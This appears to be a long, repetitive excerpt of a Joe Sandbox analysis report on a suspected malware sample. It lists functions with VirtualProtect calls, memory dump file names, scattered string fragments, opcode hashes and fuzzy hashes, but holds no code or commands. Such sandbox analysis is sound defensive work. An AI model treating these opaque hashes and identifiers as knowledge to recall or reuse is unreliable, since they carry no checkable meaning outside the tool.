                                                                                                                                                      • Instruction Fuzzy Hash: 1BC134A1D082949AF7218624DC85BEB7A79EF91310F1481FED44D66281D27E0FC68B67
                                                                                                                                                      Function 0040A8CC Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 343memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-3058551535
                                                                                                                                                      • Opcode ID: 234e483e1178b1483c96e0a5d3dd4c39ef4cbc1da0435aac5b7e633688c8e3a1
                                                                                                                                                      • Instruction ID: 65a9329dff9da8049b63510ff6d46cc8b505a5c024620a0484f6602da5aa6491
                                                                                                                                                      • Opcode Fuzzy Hash: 234e483e1178b1483c96e0a5d3dd4c39ef4cbc1da0435aac5b7e633688c8e3a1
                                                                                                                                                      • Instruction Fuzzy Hash: 20C154A2D082949BF7218624DC857EB7A79EF91310F1481FED44D6A281D27E0FC6CB67
                                                                                                                                                      Function 0040B616 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 342memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-3058551535
                                                                                                                                                      • Opcode ID: ff0b00d2677e5bf47b477799f7ef043f7de6343b797cf1b94cb9fb8b8eb8754b
                                                                                                                                                      • Instruction ID: d34d96ea33b28178faef7823f5d1e9e09da383ed3bc09bc8e5fbfe26791844d3
                                                                                                                                                      • Opcode Fuzzy Hash: ff0b00d2677e5bf47b477799f7ef043f7de6343b797cf1b94cb9fb8b8eb8754b
                                                                                                                                                      • Instruction Fuzzy Hash: 9AC145A1D082949BF7218624DC857EB7B79DF91310F1481FAD44D6A281D27E0FC6CB67
                                                                                                                                                      Function 0040B9A7 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 341memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-3058551535
                                                                                                                                                      • Opcode ID: b2e9ca790998229f48eaf2e527f22e732d548b3efc56ddd507ed2ea0ef285c88
                                                                                                                                                      • Instruction ID: 3a6b4da2a2b2809e840b2a73b18af85368b5c2db675c533ba78e0bedf2602794
                                                                                                                                                      • Opcode Fuzzy Hash: b2e9ca790998229f48eaf2e527f22e732d548b3efc56ddd507ed2ea0ef285c88
                                                                                                                                                      • Instruction Fuzzy Hash: 80C144A1D082949AF7218624DC85BEB7B79EF91310F1481FAD44D6A281D27E0FC6CB67
                                                                                                                                                      Function 0040B504 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 339memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-3058551535
                                                                                                                                                      • Opcode ID: 493a61eb689b9f4ef1c688a9a34eb757a2f489e76d5ef56f9269c69b895548e3
                                                                                                                                                      • Instruction ID: bd6dbe7b93dd49523c411a6b41401e31f19f475237dc029cb7e675cf6393c82b
                                                                                                                                                      • Opcode Fuzzy Hash: 493a61eb689b9f4ef1c688a9a34eb757a2f489e76d5ef56f9269c69b895548e3
                                                                                                                                                      • Instruction Fuzzy Hash: BCC144A1D082989BF7218624DC85BEB7A79EF91310F1481FAD44D66281D27E0FC6CB67
                                                                                                                                                      Function 0040BB4A Relevance: 42.3, APIs: 1, Strings: 23, Instructions: 305COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 0-3789451
                                                                                                                                                      • Opcode ID: 728d33ce5cd8392fae6969d104fd9af6f9ef25b71e3e986a57db29dd23adc8fa
                                                                                                                                                      • Instruction ID: 874e2093608d45835aede55c8446f2b5f904800d1c55310015db4c22bb41d1fc
                                                                                                                                                      • Opcode Fuzzy Hash: 728d33ce5cd8392fae6969d104fd9af6f9ef25b71e3e986a57db29dd23adc8fa
                                                                                                                                                      • Instruction Fuzzy Hash: 63B176A2D082949AF7218624DC457EB7A79EF91310F1480FED44D2B681D2BE0FC6CB67
                                                                                                                                                      Function 0040BBF1 Relevance: 23.0, APIs: 1, Strings: 12, Instructions: 269COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                                                                                                                                      • API String ID: 0-4069139063
                                                                                                                                                      • Opcode ID: 9df7d5d23bbc09a76e55fc722713846a0b7298c9866ff876747dccc9071441c2
                                                                                                                                                      • Instruction ID: 122b3ec247b77071abeb3fe2ad62212ee0e4536a4f113f9908a4b273c503602e
                                                                                                                                                      • Opcode Fuzzy Hash: 9df7d5d23bbc09a76e55fc722713846a0b7298c9866ff876747dccc9071441c2
                                                                                                                                                      • Instruction Fuzzy Hash: 949153A2D082949BF7218624DC457EB7A39EFD1310F1481FED84D6A681D27E0FC68B67
                                                                                                                                                      Function 0040BF78 Relevance: 23.0, APIs: 1, Strings: 12, Instructions: 218COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                                                                                                                                      • API String ID: 0-4069139063
                                                                                                                                                      • Opcode ID: 611d0005cabf44f96822be3f0a8812cbaa8a3fd56c920439c72d0e02ee5dcf49
                                                                                                                                                      • Instruction ID: 03bbd1a9fcc01feb49f49906e2d0f8e8fd5ee5de2a67679feec8f5ef71f9b084
                                                                                                                                                      • Opcode Fuzzy Hash: 611d0005cabf44f96822be3f0a8812cbaa8a3fd56c920439c72d0e02ee5dcf49
                                                                                                                                                      • Instruction Fuzzy Hash: 057113A1D082549AF7218724DC85BEB7A39EF90710F1481FEE44D66681D67E0FC6CB2B
                                                                                                                                                      Function 0040BFB0 Relevance: 23.0, APIs: 1, Strings: 12, Instructions: 206COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                                                                                                                                      • API String ID: 0-4069139063
                                                                                                                                                      • Opcode ID: f76258e3d6a9618a04de03aee0d9a9e170243ee4795f5539bebb1bff34a34aa5
                                                                                                                                                      • Instruction ID: 1ba5fe4495c7287c7b9ef3fb20152038ef40ca83fee558dec99f9d06b972943c
                                                                                                                                                      • Opcode Fuzzy Hash: f76258e3d6a9618a04de03aee0d9a9e170243ee4795f5539bebb1bff34a34aa5
                                                                                                                                                      • Instruction Fuzzy Hash: 2A7103A2D082549AF7218724DC45BEB7A39DFD0710F1481FED44D66681E6BE0FC68B2B
                                                                                                                                                      Function 0040BD59 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 197COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                                                                                                                                      • API String ID: 0-4069139063
                                                                                                                                                      • Opcode ID: e7b9b8927a1f308dcd6adc6b7bae82f96a8f9014b9efb6e6694a513b61e6bd0a
                                                                                                                                                      • Instruction ID: 05d83e1bdd861b36c7118d7b3db9dfa3e57a712bef10cd6f58d093f64900b8b7
                                                                                                                                                      • Opcode Fuzzy Hash: e7b9b8927a1f308dcd6adc6b7bae82f96a8f9014b9efb6e6694a513b61e6bd0a
                                                                                                                                                      • Instruction Fuzzy Hash: C46103A1D08254DAF7218724DC457EB7A39DFD0710F2481FED44D6A681E6BE0BC68B2B
                                                                                                                                                      Function 0040BD66 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 196COMMON
                                                                                                                                                      Download Yara Rule
